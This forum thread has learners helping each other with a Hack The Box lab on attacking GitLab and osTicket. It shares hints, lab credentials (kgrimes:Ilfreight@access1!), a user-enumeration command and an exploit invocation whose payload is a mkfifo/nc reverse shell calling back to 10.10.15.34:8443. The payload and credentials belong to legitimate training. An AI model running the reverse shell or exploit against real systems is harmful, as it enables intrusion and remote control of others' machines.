Did you ever find it? I am stuck here as well?
The answers in HTB are case sensitive, so be sure to manually check every found user in Gitlab and see the casing that gitlab uses. This subtle detail made me waste a full day on this part.
Thinking out of the box: There’s also a way to get the user without brute force. Register yourself and look around
absolutely this. case sensitive and u can find out user members a different way. besides the enum script it might be faster to use ffuf instead because the script is pretty much just fuzzing and checking if the page returns 200. its not the hardest thing to figure out to do instead. for rce and the password thing also you can use your own account instead and i think thats still within scope of what the module is trying to teach.
Friends maybe the same thing that happened to me, I was a long time trying to do the brute force in many ways and with lists, and in the end the only thing I had to do was to restart the machine, maybe because I did not restart it from the previous session where you do the enumeration, but well, that’s htb. When I restarted it and did the brute force, I found it after a few seconds.
Still i dont understand osTicket question.
Credentials be incorrect?
kgrimes:Ilfreight@access1!
Nvm.
Solved.
The only thing I gained from this section is a decrease in self-esteem.
For those having problems with the osticket login. Its the set of creds provided in the course material for the kevin user. Just make sure you are using them on the agent login panel.
Attacking Common Applications Attacking GitLab
Find another valid user on the target GitLab instance.
./gitlab_userenum.py --url http://gitlab.inlanefreight.local:8081/ --wordlist /opt/useful/seclists/Usernames/cirt-default-usernames.txt
Gain remote code execution on the GitLab instance. Submit the flag in the directory you land in.
python3 49951.py -t http://gitlab.inlanefreight.local:8081 -u hacker2 -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.15.34 8443 >/tmp/f ’
nc -lnvp 8443
Who can help me with this question: Find your way into the osTicket instance and submit the password sent from the Customer Support Agent to the customer Charles Smithson.
This is a time wasting question, check the creds given in the section using the OSINT, and filter closed tickets, and search password in the ticket name, you’ll find it there
Just want to post this clarification since it took me way too long to realize… on the GitLab Discovery lab, “example project” means the Inlanefreight Dev project, not Inlanefreight Website.